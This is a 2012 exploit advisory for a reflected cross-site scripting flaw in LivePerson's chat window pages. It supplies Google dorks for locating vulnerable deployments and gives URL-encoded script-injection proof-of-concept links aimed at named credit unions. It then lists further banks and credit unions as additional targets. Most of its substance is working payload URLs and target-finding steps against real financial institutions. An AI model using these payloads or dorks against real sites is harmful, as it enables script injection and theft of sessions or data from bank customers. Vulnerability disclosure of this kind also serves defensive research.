# Exploit Title:  LivePerson Cross Site Scripting
# Date: 15.03.2012
# Author: Sony
# Software Link: http://liveperson.com/
# Google Dorks: inurl:/window/top.asp?site= or inurl:/window/main.asp?site=
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC:
http://st2tea.blogspot.com/2012/03/liveperson-cross-site-scripting.html
..................................................................

When you use google dorks click on "If you like, you can repeat the
search with the omitted results included."

Well, yeah, we can see Cross Site Scripting in LivePerson.

What is LivePerson?

http://en.wikipedia.org/wiki/LivePerson

Today I spoke with tech support and asked who uses the LivePerson:

The fact that we currently have over 8,500 clients, including many
Fortune 500 companies such as Verizon, Adobe, Cisco, Estee Lauder,
Home Depot, Neiman Marcus, Panasonic, Bank of America, Chase, HSBC,
Microsoft, HP, IBM, Hoovers and Citibank, is testimony to the quality
of service, security and support we provide our customers. (c) Support

But well, now demo:

Safe Credit Union
https://www.safecu.org/

http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475[our
xss is here]&page=&loginsso=

What is 68511475? Site ID.

http://3.bp.blogspot.com/-MNXjJ2QHHnI/T2GndWf-H7I/AAAAAAAAAvY/KTKGP1h16ww/s1600/safecredit.JPG


http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=

American Airlines Federal Credit Union
https://www.aacreditunion.org/home.aspx

https://server.iad.liveperson.net/visitor/LPaaefcu_mbrsrvs/window/main.asp?site=LPaaefcu_mbrsrvs%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=

http://2.bp.blogspot.com/-kvOY3siw2Ek/T2Gn5BoaFqI/AAAAAAAAAvk/kMJzP7sm8Eg/s1600/liveperson.JPG

More?

Use Google Dorks. We can see in the Google Dorks:

Busey Bank
http://en.wikipedia.org/wiki/Busey_Bank (wow,1868)

Del Norte Credit Union
https://www.dncu.org/

San Diego Metrpolitan Credit Union
https://www.sdmcu.org/home/home

Bank Financial
https://www.bankfinancial.com/home/home

Baton Rouge Telco Federal Credit Union
http://www.brtelco.org/home/accounts

etc..

..................................................................

InSecurity.Ro

Because we care, we're security aware!